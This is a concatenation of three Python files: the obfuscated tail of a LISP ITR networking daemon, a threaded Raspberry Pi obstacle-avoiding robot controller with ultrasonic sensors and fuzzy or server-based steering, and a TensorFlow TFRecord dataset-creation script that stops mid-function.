        "register-reachable-rtrs": [True, "yes", "no"],
        "program-hardware": [True, "yes", "no"]}],
    "lisp interface": [lispconfig.lisp_interface_command, {
        "interface-name": [True],
        "device": [True],
        "instance-id": [True, 0, 0xffffffff],
        "dynamic-eid": [True],
        "multi-tenant-eid": [True],
        "lisp-nat": [True, "yes", "no"],
        "dynamic-eid-device": [True],
        "dynamic-eid-timeout": [True, 0, 0xff]}],
    "lisp map-resolver": [O0000oO0o00, {
        "mr-name": [True],
        "ms-name": [True],
        "dns-name": [True],
        "address": [True]}],
    "lisp map-server": [lispconfig.lisp_map_server_command, {
        "ms-name": [True],
        "address": [True],
        "dns-name": [True],
        "authentication-type": [False, "sha1", "sha2"],
        "authentication-key": [False],
        "encryption-key": [False],
        "proxy-reply": [False, "yes", "no"],
        "want-map-notify": [False, "yes", "no"],
        "merge-registrations": [False, "yes", "no"],
        "refresh-registrations": [False, "yes", "no"],
        "site-id": [False, 1, 0xffffffffffffffff]}],
    "lisp database-mapping": [i1ii1iiIi1II, {
        "prefix": [],
        "mr-name": [True],
        "ms-name": [True],
        "instance-id": [True, 0, 0xffffffff],
        "secondary-instance-id": [True, 0, 0xffffffff],
        "eid-prefix": [True],
        "group-prefix": [True],
        "dynamic-eid": [True, "yes", "no"],
        "signature-eid": [True, "yes", "no"],
        "register-ttl": [True, 1, 0xffffffff],
        "rloc": [],
        "rloc-record-name": [True],
        "elp-name": [True],
        "geo-name": [True],
        "rle-name": [True],
        "json-name": [True],
        "address": [True],
        "interface": [True],
        "priority": [True, 0, 255],
        "weight": [True, 0, 100]}],
    "lisp map-cache": [lispconfig.lisp_map_cache_command, {
        "prefix": [],
        "instance-id": [True, 0, 0xffffffff],
        "eid-prefix": [True],
        "group-prefix": [True],
        "send-map-request": [True, "yes", "no"],
        "subscribe-request": [True, "yes", "no"],
        "rloc": [],
        "rloc-record-name": [True],
        "rle-name": [True],
        "elp-name": [True],
        "address": [True],
        "priority": [True, 0, 255],
        "weight": [True, 0, 100]}],
    "lisp itr-map-cache": [lispconfig.lisp_map_cache_command, {
        "prefix": [],
        "instance-id": [True, 0, 0xffffffff],
        "eid-prefix": [True],
        "group-prefix": [True],
        "rloc": [],
        "rloc-record-name": [True],
        "rle-name": [True],
        "elp-name": [True],
        "address": [True],
        "priority": [True, 0, 255],
        "weight": [True, 0, 100]}],
    "lisp explicit-locator-path": [lispconfig.lisp_elp_command, {
        "elp-name": [False],
        "elp-node": [],
        "address": [True],
        "probe": [True, "yes", "no"],
        "strict": [True, "yes", "no"],
        "eid": [True, "yes", "no"]}],
    "lisp replication-list-entry": [lispconfig.lisp_rle_command, {
        "rle-name": [False],
        "rle-node": [],
        "address": [True],
        "level": [True, 0, 255]}],
    "lisp geo-coordinates": [lispconfig.lisp_geo_command, {
        "geo-name": [False],
        "geo-tag": [False]}],
    "lisp json": [lispconfig.lisp_json_command, {
        "json-name": [False],
        "json-string": [False]}],
    # "show" clauses dispatch to local display handlers defined earlier
    # in this file.
    "show itr-map-cache": [IIiiIiI1, {}],
    "show itr-rloc-probing": [I1i1iii, {}],
    "show itr-keys": [oo, {}],
    "show itr-dynamic-eid": [lispconfig.lisp_show_dynamic_eid_command, {}]
}
if 28 - 28: Oo0Ooo + IiII % II111iiii / OoO0O00 + i11iIiiIii
if 20 - 20: I1ii11iIi11i
if 3 - 3: OoO0O00 * i1IIi . I1IiiI . O0 - OoOoOO00
if 81 - 81: I1IiiI - iIii1I11I1II1 / I1IiiI / O0
if 34 - 34: Ii1I * Ii1I - I1ii11iIi11i - O0 . i11iIiiIii
if 32 - 32: iIii1I11I1II1 . OoO0O00 * oO0o / OOooOOo . II111iiii - Oo0Ooo
# --- lisp-itr main: start up, then run the select() event loop until one of
# the control sockets closes, then shut down cleanly. ---
if (I111I1Iiii1i() == False):
    lisp.lprint("lisp_itr_startup() failed")
    lisp.lisp_print_banner("ITR abnormal exit")
    exit(1)
if 10 - 10: I1ii11iIi11i / i11iIiiIii - Ii1I + oO0o * I1IiiI
if 94 - 94: I1IiiI + iIii1I11I1II1 / O0 - OoooooooOO % I1ii11iIi11i
# Sockets to select() on: ephemeral control socket, lisp-itr named IPC
# socket, lisp-core control socket, and the data-plane punt socket.
o0Oo0oo = [i111I, oO0oIIII,
           II1Ii1iI1i, Oo0oO0oo0oO00]
if 44 - 44: I1IiiI % Ii1I * I1IiiI . Oo0Ooo + I1ii11iIi11i . OOooOOo
if 6 - 6: IiII * OoooooooOO + I1Ii111 / Ii1I
if 35 - 35: ooOoO0o % I1IiiI - ooOoO0o - OoO0O00 - OoooooooOO
if 46 - 46: i1IIi . i1IIi . oO0o / I11i / ooOoO0o
Ii1Iiii = True
# lisp_receive()/lisp_parse_packet() expect 3-element socket lists.
Oo = [i111I] * 3
i1IIii11i1I1 = [II1Ii1iI1i] * 3
if 12 - 12: i1IIi / OOooOOo % ooOoO0o * IiII * O0 * iIii1I11I1II1
while (True):
    # Block until any socket is readable; a select() failure (e.g. on
    # shutdown signal) exits the loop.
    try: OOOO, oO, ii1IIiII111I = select.select(o0Oo0oo, [], [])
    except: break
    if 19 - 19: I1IiiI % Ii1I . IiII * ooOoO0o
    if 89 - 89: OoOoOO00 . OOooOOo
    if 7 - 7: oO0o % OoOoOO00 - I1IiiI + Oo0Ooo
    if 70 - 70: II111iiii + I1Ii111 + i11iIiiIii - i1IIi / IiII
    # Punted packets from the external data-plane process.
    if (lisp.lisp_ipc_data_plane and Oo0oO0oo0oO00 in OOOO):
        lisp.lisp_process_punt(Oo0oO0oo0oO00, II1iII1i,
                               iiI1iIiI)
    if 40 - 40: I1ii11iIi11i * I1Ii111
    if 38 - 38: O0 . Oo0Ooo + OoOoOO00 - oO0o
    if 43 - 43: iII111i + Oo0Ooo / OoooooooOO
    if 24 - 24: O0 + o0oOOo0O0Ooo * Ii1I - I1Ii111
    if 10 - 10: i11iIiiIii
    # Control packets on the ephemeral socket. RLOC-probe replies are
    # ignored here because they are consumed via the pcap path instead.
    if (i111I in OOOO):
        O00OoOoO, II11, O00oooo00o0O, ii11iO000oo00OOOOO = lisp.lisp_receive(Oo[0],
                                                                            False)
        if (II11 == ""): break
        if 52 - 52: Oo0Ooo . I11i / o0oOOo0O0Ooo + Ii1I % I11i
        if (lisp.lisp_is_rloc_probe_reply(ii11iO000oo00OOOOO[0])):
            lisp.lprint("ITR ignoring RLOC-probe reply, using pcap")
            continue
        if 47 - 47: OoooooooOO / OOooOOo % OoO0O00 / Oo0Ooo - I1ii11iIi11i
        lisp.lisp_parse_packet(Oo, ii11iO000oo00OOOOO, II11, O00oooo00o0O)
    if 13 - 13: iII111i . I1IiiI * OOooOOo + Ii1I + I1IiiI - i11iIiiIii
    if 79 - 79: ooOoO0o . oO0o / oO0o - ooOoO0o * Oo0Ooo / o0oOOo0O0Ooo
    if 19 - 19: I1ii11iIi11i
    if 46 - 46: iIii1I11I1II1 . i11iIiiIii - OoOoOO00 % O0 / II111iiii * i1IIi
    if 66 - 66: O0
    # Control packets on the lisp-core socket (port 4342 forwarded traffic).
    if (II1Ii1iI1i in OOOO):
        O00OoOoO, II11, O00oooo00o0O, ii11iO000oo00OOOOO = lisp.lisp_receive(i1IIii11i1I1[0],
                                                                            False)
        if (II11 == ""): break
        if 52 - 52: OoO0O00 * OoooooooOO
        if (lisp.lisp_is_rloc_probe_reply(ii11iO000oo00OOOOO[0])):
            lisp.lprint("ITR ignoring RLOC-probe reply, using pcap")
            continue
        if 12 - 12: O0 + IiII * i1IIi . OoO0O00
        o0OO0oooo = lisp.lisp_parse_packet(i1IIii11i1I1, ii11iO000oo00OOOOO, II11, O00oooo00o0O)
        if 40 - 40: I1Ii111 - OoOoOO00 * I11i - IiII / OoOoOO00
        if 71 - 71: oO0o / OoooooooOO % IiII / OoOoOO00 % I1Ii111
        if 19 - 19: I1Ii111 + IiII / oO0o / II111iiii
        if 92 - 92: i1IIi % ooOoO0o + ooOoO0o - iIii1I11I1II1 . Ii1I
        if 33 - 33: o0oOOo0O0Ooo / O0 + OOooOOo
        # A truthy parse result means new RLOC state arrived: trigger an
        # immediate RLOC-probe pass.
        if (o0OO0oooo):
            I11iiI11iiI = [i111I, i111I]
            lisp.lisp_start_rloc_probe_timer(0, I11iiI11iiI)
        if 75 - 75: IiII % i11iIiiIii + iIii1I11I1II1
        if 92 - 92: OoOoOO00 % O0
        if 55 - 55: iIii1I11I1II1 * iII111i
        if 85 - 85: iIii1I11I1II1 . II111iiii
        if 54 - 54: Ii1I . OoooooooOO % Oo0Ooo
        if 22 - 22: OOooOOo
        if 22 - 22: iII111i * I11i - Oo0Ooo * O0 / i11iIiiIii
    # IPC messages on the lisp-itr named socket: CLI commands, API calls,
    # punted data-packets, or control packets.
    if (oO0oIIII in OOOO):
        O00OoOoO, II11, O00oooo00o0O, ii11iO000oo00OOOOO = lisp.lisp_receive(oO0oIIII, True)
        if 78 - 78: Oo0Ooo * O0 / ooOoO0o + OoooooooOO + OOooOOo
        if (II11 == ""): break
        if 23 - 23: iII111i % OoooooooOO / iIii1I11I1II1 + I1ii11iIi11i / i1IIi / o0oOOo0O0Ooo
        if (O00OoOoO == "command"):
            if (ii11iO000oo00OOOOO == "clear"):
                lisp.lisp_clear_map_cache()
                continue
            if 94 - 94: i1IIi
            # "nonce%..." messages feed the echo-nonce state machine.
            if (ii11iO000oo00OOOOO.find("nonce%") != -1):
                iIII11I1I1II(ii11iO000oo00OOOOO)
                continue
            if 36 - 36: I1IiiI + Oo0Ooo
            lispconfig.lisp_process_command(oO0oIIII, O00OoOoO,
                                            ii11iO000oo00OOOOO, "lisp-itr", [I1IiII1I1i1I1])
        elif (O00OoOoO == "api"):
            lisp.lisp_process_api("lisp-itr", oO0oIIII, ii11iO000oo00OOOOO)
        elif (O00OoOoO == "data-packet"):
            O0oOo00o0(ii11iO000oo00OOOOO, "ipc")
        else:
            if (lisp.lisp_is_rloc_probe_reply(ii11iO000oo00OOOOO[0])):
                lisp.lprint("ITR ignoring RLOC-probe request, using pcap")
                continue
            if 46 - 46: iII111i
            lisp.lisp_parse_packet(II1iII1i, ii11iO000oo00OOOOO, II11, O00oooo00o0O)
        if 65 - 65: i1IIi . I1ii11iIi11i / ooOoO0o
        if 11 - 11: IiII * ooOoO0o / ooOoO0o - OOooOOo
if 68 - 68: I1IiiI % IiII - IiII / I1IiiI + I1ii11iIi11i - Oo0Ooo
if 65 - 65: ooOoO0o - i1IIi
if 62 - 62: I11i / oO0o % Oo0Ooo . OoooooooOO / i11iIiiIii / I1Ii111
# Clean shutdown path (loop exited via break).
II1Ii11I111I()
lisp.lisp_print_banner("ITR normal exit")
exit(0)
if 60 - 60: I1IiiI % oO0o / o0oOOo0O0Ooo % oO0o * i11iIiiIii / iII111i
if 34 - 34: I1Ii111 - OOooOOo
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
simple_rp_main.py | import argparse
import os
import socket
import threading
import time
import traceback
import RPi.GPIO as GPIO
# start pigpiod service
# os.system('sudo pigpiod')
import pigpio
from fuzzy_system.simple_fuzzy_system import SimpleFuzzySystem
from misc.connection_helper import ConnectionHelper
from misc.motor_controller import QuadMotorController
from misc.range_sensor import UltraSonicSensors
# init controllers
# --- Module-level hardware handles and shared state. All of the worker
# threads below read/write these globals directly. ---
motor_controller = QuadMotorController()
fuzzy_system = None  # created in __main__ only when running without a server
# NOTE(review): this rebinds the name `socket`, shadowing the socket module
# imported above — works here because the module is only needed for this
# one constructor call, but it is fragile.
socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
pi = pigpio.pi()
# Ultrasonic sensor GPIO pin pairs, grouped by facing. These are Python
# *sets* of tuples; assumed to be (trigger, echo) BCM pins — TODO confirm
# against UltraSonicSensors.
r_range_sensors_pins = {
    # R
    (23, 24),
    (23, 22),
    (23, 27),
}
f_range_sensors_pins = {
    # F
    (23, 17),
    (23, 4),
}
l_range_sensors_pins = {
    # L
    (23, 18),
    (23, 25),
    (23, 12),
}
# Lifecycle states; `status` is the shared run flag every thread polls.
run = 'Running'
STOP = 'Stopped'
MANUAL = 'Manual'
status = run
# Simulation Timer: seconds to run before forcing STOP (-1 = no limit).
sim_time = 60.0
goal_threshold = 0.5
# Robot pose (x, y, theta) and target pose — only the defaults are used
# in this file.
x, y, theta = 0, 0, 0
x_d, y_d, theta_d = 2, 0, 0
# Latest range-sensor readings (left / front / right), updated by
# range_updater().
dl = 2.2
df = 2.2
dr = 2.2
# Steering angle and (u, w) = linear/angular speed commands.
angle = 0
u, w = 10, 0
motor_status = STOP
first_time = True  # first server exchange sends the handshake message
# calculations precision (decimal places for rounding)
degree = 2
def range_updater():
    """Sensor thread: continuously refresh the dl/df/dr range globals.

    Creates the three UltraSonicSensors banks, then polls them every 0.2 s
    while the shared `status` flag stays at `run`. Readings are halved and
    rounded to 2 decimals (scale factor presumably converts the raw units —
    TODO confirm against UltraSonicSensors.update()). On any error the
    sensors and the pigpio handle are torn down and `status` is set to STOP,
    which also stops the other threads.
    """
    global dl, df, dr, status
    print('range Sensor thread is running')
    # init range sensors
    l_range_sensors = UltraSonicSensors(pi, l_range_sensors_pins)
    f_range_sensors = UltraSonicSensors(pi, f_range_sensors_pins)
    r_range_sensors = UltraSonicSensors(pi, r_range_sensors_pins)
    while status == run:
        try:
            dl = l_range_sensors.update()
            dl = round(dl * 0.5, 2)
            df = f_range_sensors.update()
            df = round(df * 0.5, 2)
            dr = r_range_sensors.update()
            dr = round(dr * 0.5, 2)
            time.sleep(0.2)
        except Exception as e:
            print(e)
            print(traceback.format_exc())
            # Release hardware resources before signalling shutdown.
            l_range_sensors.cancel()
            f_range_sensors.cancel()
            r_range_sensors.cancel()
            pi.stop()
            status = STOP
            break
    print('range Sensor thread is stopped')
def reverse(m_speed=None):
    """Drive backwards at `m_speed` (controller default when None).

    On failure the motor controller is re-created, since it can end up in a
    bad state; the error is printed rather than raised.
    """
    global motor_controller, motor_status
    try:
        motor_controller.move_backward(back_speed=m_speed)
    except Exception as err:
        motor_controller = QuadMotorController()
        print(err)
        print(traceback.format_exc())
def forwards(m_speed=None):
    """Drive forwards at `m_speed` (controller default when None).

    On failure the motor controller is re-created and the error printed.
    """
    global motor_controller, motor_status
    try:
        print('forward')
        motor_controller.move_forward(forward_speed=m_speed)
    except Exception as err:
        motor_controller = QuadMotorController()
        print(err)
        print(traceback.format_exc())
def turnright(m_speed=None):
    """Turn right at `m_speed` (controller default when None).

    On failure the motor controller is re-created and the error printed.
    """
    global motor_controller, motor_status
    try:
        print('right')
        motor_controller.move_right(right_speed=m_speed)
    except Exception as err:
        motor_controller = QuadMotorController()
        print(err)
        print(traceback.format_exc())
def turnleft(m_speed=None):
    """Turn left at `m_speed` (controller default when None).

    On failure the motor controller is re-created and the error printed.
    """
    global motor_controller, motor_status
    try:
        print('left')
        motor_controller.move_left(left_speed=m_speed)
    except Exception as err:
        motor_controller = QuadMotorController()
        print(err)
        print(traceback.format_exc())
def stopall(force=False):
    """Stop the robot.

    force=True issues a hard controller stopall(); otherwise a zero-speed
    move command is sent, which coasts to a stop. Sets the module-level
    motor_status marker. On failure the controller is re-created and the
    error printed.
    """
    global motor_controller, motor_status
    try:
        if force:
            motor_controller.stopall()
        else:
            motor_controller.move_left(left_speed=0)
        motor_status = 'stop'
    except Exception as err:
        motor_controller = QuadMotorController()
        print(err)
        print(traceback.format_exc())
# Helper Functions
def map(value, istart, istop, ostart, ostop):
    """Linearly rescale `value` from [istart, istop] into [ostart, ostop].

    NOTE: the name shadows the builtin ``map``; kept for compatibility
    with existing callers.
    """
    fraction = (value - istart) / (istop - istart)
    return ostart + (ostop - ostart) * fraction
def do_fuzzy():
    """Fuzzy-control thread: derive (u, angle) commands from sensor globals.

    Runs while the shared `status` flag stays at `run`: snapshots the
    current df/dl/dr/u globals, clamps the distances into [0, 70] (the
    fuzzy system's expected input range — presumably; TODO confirm against
    SimpleFuzzySystem), and writes the resulting velocity/steering back
    into the `u` and `angle` globals consumed by auto_movement(). Any
    exception stops the whole robot by setting status = STOP.
    """
    global dl, df, dr, status, u, angle
    print('Fuzzy system is activated')
    while status == run:
        try:
            front, left, right, velocity = df, dl, dr, u
            front = min(max(front, 0), 70)
            left = min(max(left, 0), 70)
            right = min(max(right, 0), 70)
            print(f'front : {front},left:{left},right:{right}')
            values = {
                "front": front,
                "left": left,
                "right": right,
                "velocity": velocity
            }
            u, angle = fuzzy_system.run(values)
        except Exception as e:
            print(e)
            print(traceback.format_exc())
            status = STOP
            break
    print('Fuzzy system is Deactivated')
def update_data():
    """Exchange one sensor/command round-trip with the remote server.

    On the first call, sends a {"method": "simple"} handshake and waits for
    the acknowledgement. Every call then sends the current (rounded)
    dl/df/dr readings plus the current velocity as JSON and blocks until
    the server replies with {"velocity": ..., "angle": ...}, which are
    written into the `u` and `angle` globals consumed by auto_movement().
    """
    global socket, dl, df, dr, u, angle, first_time
    if first_time:
        message = {
            "method": 'simple'
        }
        ConnectionHelper.send_json(socket, message)
        ConnectionHelper.receive_json(socket)
        first_time = False
    # take sensors current value (snapshot, since the sensor thread keeps
    # mutating the globals concurrently)
    current_dl = dl
    current_df = df
    current_dr = dr
    current_dl = round(current_dl, degree)
    current_df = round(current_df, degree)
    current_dr = round(current_dr, degree)
    print(f"dl : {current_dl} df : {current_df} dr : {current_dr} velocity:{u}")
    message = {
        "dl": current_dl,
        "df": current_df,
        "dr": current_dr,
        "velocity": u
    }
    ConnectionHelper.send_json(socket, message)
    result = ConnectionHelper.receive_json(socket)
    print("Got >>", result)
    u = result["velocity"]
    angle = result["angle"]
# Last computed forward/backward and left/right command durations.
# fb_speed is currently unused; lr_speed is written by auto_movement().
fb_speed = 0
lr_speed = 0


def auto_movement():
    """Movement thread: translate (u, angle) into timed motor commands.

    While `status` is `run`: optionally fetch fresh commands from the
    server, then either turn (if |angle| > 25 degrees) for a duration
    proportional to the angle, or drive forward briefly at speed `u`.
    Any exception stops the motors and ends the thread; on exit the
    shared `status` flag is forced to STOP.
    """
    global status, lr_speed
    print('auto movement thread is running')
    prev_u = -1  # NOTE(review): never read — leftover from an older version?
    while status == run:
        try:
            # communicate with server
            if use_server:
                update_data()
            # Large steering angle: pulse a turn whose duration is scaled
            # by the (empirical) 375 deg/s turn rate, then re-evaluate.
            if angle is not None and angle != 0 and abs(angle) > 25:
                degree_per_second = 375
                lr_speed = round(abs(angle / degree_per_second), 2)
                print('LR {} '.format(lr_speed))
                if angle > 0:
                    turnleft(100)
                elif angle < 0:
                    turnright(100)
                time.sleep(lr_speed)
                stopall()
                continue
            # Otherwise drive forward in short 0.3 s bursts.
            if u is not None and u != 0:
                forwards(u)
                time.sleep(0.3)
                stopall()
        except Exception as e:
            print(e)
            print(traceback.format_exc())
            stopall()
            break
    print('Robot Stopped')
    time.sleep(0.5)
    status = STOP
def print_status():
    """Console thread: clear the screen and dump current state ~3x/second.

    NOTE(review): the format labels look swapped — `angle` is printed as
    "lr speed" and `u` as "fb speed"; confirm intended wording before
    changing the output.
    """
    while status == run:
        os.system('clear')
        print('******************************')
        print('lr speed is : {}\nfb speed is : {} '.format(angle, u))
        print('******************************')
        print('Distance L:{} F:{} R:{}'.format(dl, df, dr))
        print('******************************')
        time.sleep(0.3)
def simulation_timer():
    """Watchdog thread: force status = STOP after `sim_time` seconds.

    A sim_time of -1 disables the countdown and stops immediately. The
    loop also exits early if some other thread already set status != run.
    The trailing 2-second sleep gives the other threads time to observe
    the STOP flag before this thread reports completion.
    """
    global status, sim_time
    print('simulation timer has started')
    if sim_time != -1:
        end = time.time() + sim_time
        while time.time() < end and status == run:
            time.sleep(1)
    status = STOP
    time.sleep(2)
    print('simulation timer has stopped')
# When True, steering commands come from the remote server; when False,
# the on-board fuzzy system computes them. Decided from --host below.
use_server = True
if __name__ == '__main__':
    try:
        # --host '' (default) selects on-board fuzzy mode; a non-empty
        # host selects server mode on --port (default 8888).
        parser = argparse.ArgumentParser()
        parser.add_argument('--host', type=str,
                            default='')
        parser.add_argument('--port', type=int,
                            default=8888)
        arguments = parser.parse_args()
        use_server = arguments.host != ''
        if use_server:
            try:
                socket.connect((arguments.host, arguments.port))
                print('connected to server ' + arguments.host + ':' + str(arguments.port))
            except Exception as e:
                print(e)
                print(traceback.format_exc())
                # Connection failure aborts the run before threads start.
                status = STOP
        else:
            print('initializing Fuzzy System')
            fuzzy_system = SimpleFuzzySystem()
            print('Fuzzy System initialized')
        # Worker threads: sensors, console display, watchdog, movement,
        # and (local mode only) the fuzzy controller.
        fuzzy_thread = threading.Thread(target=do_fuzzy)
        range_sensor_thread = threading.Thread(target=range_updater)
        auto_movement_thread = threading.Thread(target=auto_movement)
        simulation_timer_thread = threading.Thread(target=simulation_timer)
        print_thread = threading.Thread(target=print_status)
        range_sensor_thread.start()
        time.sleep(1)  # let the first sensor readings land before moving
        print_thread.start()
        simulation_timer_thread.start()
        auto_movement_thread.start()
        if not use_server:
            fuzzy_thread.start()
            fuzzy_thread.join()
        # Join Threads to Stop together
        # movement_thread.join()
        range_sensor_thread.join()
        auto_movement_thread.join()
        simulation_timer_thread.join()
        print_thread.join()
    finally:
        # Force STOP MOTORS
        stopall(force=True)
        GPIO.cleanup()
|
create_tfrecords.py | """
Create the tfrecord files for a dataset.
A lot of this code comes from the tensorflow inception example, so here is their license:
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
from datetime import datetime
import hashlib
import json
import os
from queue import Queue
import random
import sys
import threading
import numpy as np
import tensorflow as tf
def _int64_feature(value):
    """Wrap `value` (int or list of ints) in an int64 Feature proto."""
    values = value if isinstance(value, list) else [value]
    return tf.train.Feature(int64_list=tf.train.Int64List(value=values))
def _float_feature(value):
    """Wrap `value` (float or list of floats) in a float Feature proto."""
    values = value if isinstance(value, list) else [value]
    return tf.train.Feature(float_list=tf.train.FloatList(value=values))
def _bytes_feature(value):
    """Wrap `value` (bytes or list of bytes) in a bytes Feature proto."""
    values = value if isinstance(value, list) else [value]
    return tf.train.Feature(bytes_list=tf.train.BytesList(value=values))
def _validate_text(text):
"""If text is not str or unicode, then try to convert it to str."""
if isinstance(text, str):
return text.encode('utf-8')
elif isinstance(text, unicode):
return text.encode('utf-8', 'ignore')
else:
return text.encode('utf-8','ignore')
def _convert_to_example(image_example, image_buffer, height, width, colorspace=b'RGB',
                        channels=3, image_format=b'JPEG'):
    """Build an Example proto for an example.

    All annotation fields are optional: missing keys default to empty
    lists / zeros so the resulting Example always has a complete, fixed
    schema. The feature keys follow the tensorflow/models Object Detection
    TFRecord convention.

    Args:
      image_example: dict, an image example (see key lookups below for the
        expected nested structure: 'filename', 'id', 'class', 'object').
      image_buffer: string, JPEG encoding of RGB image
      height: integer, image height in pixels
      width: integer, image width in pixels
      colorspace: bytes label stored in 'image/colorspace' (default b'RGB').
      channels: channel count stored in 'image/channels' (default 3).
      image_format: bytes label stored in 'image/format' (default b'JPEG').
    Returns:
      Example proto
    """
    # Required
    filename = str(image_example['filename'])
    image_id = str(image_example['id'])
    # Class label for the whole image
    image_class = image_example.get('class', {})
    class_label = image_class.get('label', 0)
    class_text = _validate_text(image_class.get('text', ''))
    class_conf = image_class.get('conf', 1.)
    # Objects
    image_objects = image_example.get('object', {})
    object_count = image_objects.get('count', 0)
    # Bounding Boxes (parallel lists, one entry per object)
    image_bboxes = image_objects.get('bbox', {})
    xmin = image_bboxes.get('xmin', [])
    xmax = image_bboxes.get('xmax', [])
    ymin = image_bboxes.get('ymin', [])
    ymax = image_bboxes.get('ymax', [])
    bbox_scores = image_bboxes.get('score', [])
    bbox_labels = image_bboxes.get('label', [])
    bbox_text = list(map(_validate_text, image_bboxes.get('text', [])))
    bbox_label_confs = image_bboxes.get('conf', [])
    # Parts (keypoints: x, y, visibility, score)
    image_parts = image_objects.get('parts', {})
    parts_x = image_parts.get('x', [])
    parts_y = image_parts.get('y', [])
    parts_v = image_parts.get('v', [])
    parts_s = image_parts.get('score', [])
    # Areas
    object_areas = image_objects.get('area', [])
    # Ids
    object_ids = list(map(str, image_objects.get('id', [])))
    # Any extra data (e.g. stringified json)
    extra_info = str(image_class.get('extra', ''))
    # Additional fields for the format needed by the Object Detection
    # repository: a sha256 key of the raw image bytes plus crowd flags.
    key = hashlib.sha256(image_buffer).hexdigest()
    is_crowd = image_objects.get('is_crowd', [])
    example = tf.train.Example(features=tf.train.Features(feature={
        'image/height': _int64_feature(height),
        'image/width': _int64_feature(width),
        'image/colorspace': _bytes_feature(colorspace),
        'image/channels': _int64_feature(channels),
        'image/format': _bytes_feature(image_format),
        'image/filename': _bytes_feature(tf.compat.as_bytes(filename)),
        'image/id': _bytes_feature(tf.compat.as_bytes(image_id)),
        'image/encoded': _bytes_feature(image_buffer),
        'image/extra': _bytes_feature(tf.compat.as_bytes(extra_info)),
        'image/class/label': _int64_feature(class_label),
        'image/class/text': _bytes_feature(tf.compat.as_bytes(class_text)),
        'image/class/conf': _float_feature(class_conf),
        'image/object/bbox/xmin': _float_feature(xmin),
        'image/object/bbox/xmax': _float_feature(xmax),
        'image/object/bbox/ymin': _float_feature(ymin),
        'image/object/bbox/ymax': _float_feature(ymax),
        'image/object/bbox/label': _int64_feature(bbox_labels),
        'image/object/bbox/text': _bytes_feature(bbox_text),
        'image/object/bbox/conf': _float_feature(bbox_label_confs),
        'image/object/bbox/score': _float_feature(bbox_scores),
        'image/object/parts/x': _float_feature(parts_x),
        'image/object/parts/y': _float_feature(parts_y),
        'image/object/parts/v': _int64_feature(parts_v),
        'image/object/parts/score': _float_feature(parts_s),
        'image/object/count': _int64_feature(object_count),
        'image/object/area': _float_feature(object_areas),
        'image/object/id': _bytes_feature(object_ids),
        # Additional fields for the format needed by the Object Detection repository
        'image/source_id': _bytes_feature(tf.compat.as_bytes(image_id)),
        'image/key/sha256': _bytes_feature(tf.compat.as_bytes(key)),
        'image/object/class/label': _int64_feature(bbox_labels),
        'image/object/class/text': _bytes_feature(bbox_text),
        'image/object/is_crowd': _int64_feature(is_crowd)
    }))
    return example
class ImageCoder(object):
    """Helper class that provides TensorFlow image coding utilities.

    Builds one tf.Session and two small graphs (PNG->JPEG re-encode and
    JPEG decode) once, so the per-image calls below are cheap.
    TensorFlow 1.x API (Session/placeholder).
    """
    def __init__(self):
        # Create a single Session to run all image coding calls.
        self._sess = tf.Session()
        # Initializes function that converts PNG to JPEG data.
        self._png_data = tf.placeholder(dtype=tf.string)
        image = tf.image.decode_png(self._png_data, channels=3)
        self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
        # Initializes function that decodes RGB JPEG data.
        self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
        self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
    def png_to_jpeg(self, image_data):
        """Re-encode raw PNG bytes as JPEG bytes."""
        return self._sess.run(self._png_to_jpeg,
                              feed_dict={self._png_data: image_data})
    def decode_jpeg(self, image_data):
        """Decode raw JPEG bytes into an H x W x 3 RGB array."""
        image = self._sess.run(self._decode_jpeg,
                               feed_dict={self._decode_jpeg_data: image_data})
        assert len(image.shape) == 3, "JPEG needs to have height x width x channels"
        assert image.shape[2] == 3, "JPEG needs to have 3 channels (RGB)"
        return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
_, file_extension = os.path.splitext(filename)
return file_extension.lower() == '.png'
def _process_image(filename, coder):
    """Process a single image file.
    Args:
      filename: string, path to an image file e.g., '/path/to/example.JPG'.
      coder: instance of ImageCoder to provide TensorFlow image coding utils.
    Returns:
      image_buffer: string, JPEG encoding of RGB image.
      height: integer, image height in pixels.
      width: integer, image width in pixels.
    """
    # Read the image file.
    image_data = tf.gfile.FastGFile(filename, 'rb').read()
    # PNG inputs are re-encoded so every record stores JPEG bytes.
    if _is_png(filename):
        image_data = coder.png_to_jpeg(image_data)
    # Decode the RGB JPEG (validates the bytes and yields the dimensions).
    image = coder.decode_jpeg(image_data)
    # Check that image converted to RGB
    assert len(image.shape) == 3
    height = image.shape[0]
    width = image.shape[1]
    assert image.shape[2] == 3
    return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, output_directory,
                               dataset, num_shards, store_images, error_queue):
    """Processes and saves list of images as TFRecord in 1 thread.
    Args:
      coder: instance of ImageCoder to provide TensorFlow image coding utils.
      thread_index: integer, unique batch to run index is within [0, len(ranges)).
      ranges: list of pairs of integers specifying ranges of each batches to
        analyze in parallel.
      name: string, unique identifier specifying the data set (e.g. `train` or `test`)
      output_directory: string, file path to store the tfrecord files.
      dataset: list, a list of image example dicts
      num_shards: integer number of shards for this data set.
      store_images: bool, should the image be stored in the tfrecord
      error_queue: Queue, a queue to place image examples that failed.
    """
    # Each thread produces N shards where N = int(num_shards / num_threads).
    # For instance, if num_shards = 128, and the num_threads = 2, then the first
    # thread would produce shards [0, 64).
    num_threads = len(ranges)
    assert not num_shards % num_threads
    num_shards_per_batch = int(num_shards / num_threads)
    shard_ranges = np.linspace(ranges[thread_index][0],
                               ranges[thread_index][1],
                               num_shards_per_batch + 1).astype(int)
    num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
    counter = 0        # images written by this thread, across shards
    error_counter = 0  # images that failed and went to error_queue
    for s in range(num_shards_per_batch):
